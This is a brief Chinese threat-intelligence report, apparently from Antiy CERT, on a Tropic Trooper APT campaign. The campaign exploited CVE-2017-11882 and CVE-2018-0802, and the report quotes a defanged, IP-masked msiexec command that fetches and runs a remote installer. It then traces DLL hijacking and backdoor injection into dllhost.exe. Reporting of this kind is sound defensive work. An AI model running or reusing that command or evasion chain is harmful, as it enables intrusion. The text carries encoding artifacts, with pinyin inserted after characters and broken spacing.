近日，安天 CERT（安全研究與應(yīng)急 處理中心）在梳理網(wǎng)絡(luò)安全事件時(shí)發(fā)現(xiàn)了 Tropic Trooper APT 組織的最新攻擊活動(dòng)。 Tropic Trooper APT 組織自 2011 年（至少） 活躍至今。Trend Micro 安全專家在 2015 年第一次發(fā)現(xiàn)該組織，當(dāng)時(shí)其對(duì)菲律賓軍 方和亞洲部分國(guó)家地區(qū)的行政機(jī)構(gòu)、重工 業(yè)行業(yè)實(shí)施網(wǎng)絡(luò)攻擊。

     在其最新的攻擊活動(dòng)中，攻擊者使用 了 具 有 CVE-2017-11882 或 CVE-2018-0802 漏洞的文檔來(lái)對(duì)目標(biāo)進(jìn)行攻擊。一 旦用戶打開(kāi)了漏洞文檔，則會(huì)運(yùn)行命令 “msiexec /q /I hxxp://61.216.***.***/ in.sys”，其中 in.sys 是一個(gè)安裝文件，運(yùn) 行后會(huì)釋放帶有后門的文件 UserInstall.exe 然 后 刪 除 自 身。UserInstall.exe 運(yùn) 行 后 會(huì)在 C:\ProgramData\Apple\Update\ 文 件 夾 下釋放一個(gè)白文件 sidebar.exe（Win7 中的 桌面小工具）、一個(gè)惡意文件 wab32res. dll 以 及 一 個(gè) 加 密 的 配 置 文 件 secn. tsp。UserInstall.exe 使 用 C:\Windows\ SysWOW64\bitsadmin.exe 來(lái) 運(yùn) 行 sidebar. exe，通過(guò) dll 劫持使其加載 wab32res.dll， 從而避免被殺毒軟件檢測(cè)到。wab32res. dll 被 加 載 后 會(huì) 運(yùn) 行 dllhost.exe， 并 在 dllhost.exe 進(jìn) 程 中 注 入 dll 后 門 TClient， wab32res.dll 會(huì)創(chuàng)建一個(gè)硬編碼的互斥量避 免將 dll 后門注入到其他的 dllhost.exe 進(jìn)程 中。TClient 會(huì)加載配置文件 secn.tsp，對(duì) 其進(jìn)行解密操作，然后與 C2 服務(wù)器進(jìn)行 通信。

     在持續(xù)跟蹤分析 APT 攻擊事件的同時(shí)，相關(guān)攻擊組織也在不斷進(jìn)化和升級(jí)， 其攻擊行動(dòng)并不會(huì)因被曝光而停歇。攻擊 組織為達(dá)成戰(zhàn)略目的會(huì)不斷更新、修改戰(zhàn) 術(shù)，如惡意代碼的源碼更新、最新漏洞的 利用、最新商業(yè)軍火的購(gòu)買等，有些組織 甚至?xí)嬉?guī)避以往的行為特點(diǎn)和攻擊資 源。通過(guò)曝光威懾 APT 攻擊者，將提高其 攻擊成本、收窄收割范圍，也有助于被攻 擊方獲取輿論和道義上的主動(dòng)，并更深入 認(rèn)知相關(guān)威脅。但另一方面，其也會(huì)導(dǎo)致 攻擊者調(diào)整攻擊資源和設(shè)施，提升攻擊策 略，以研發(fā)和采用更先進(jìn)的攻擊裝備。因 此，對(duì) APT 的防御必須立足于長(zhǎng)期、持續(xù)、 系統(tǒng)的安全建設(shè)和投入之上。

      目前，安天追影產(chǎn)品已經(jīng)實(shí)現(xiàn)了對(duì)該 類惡意代碼的檢出。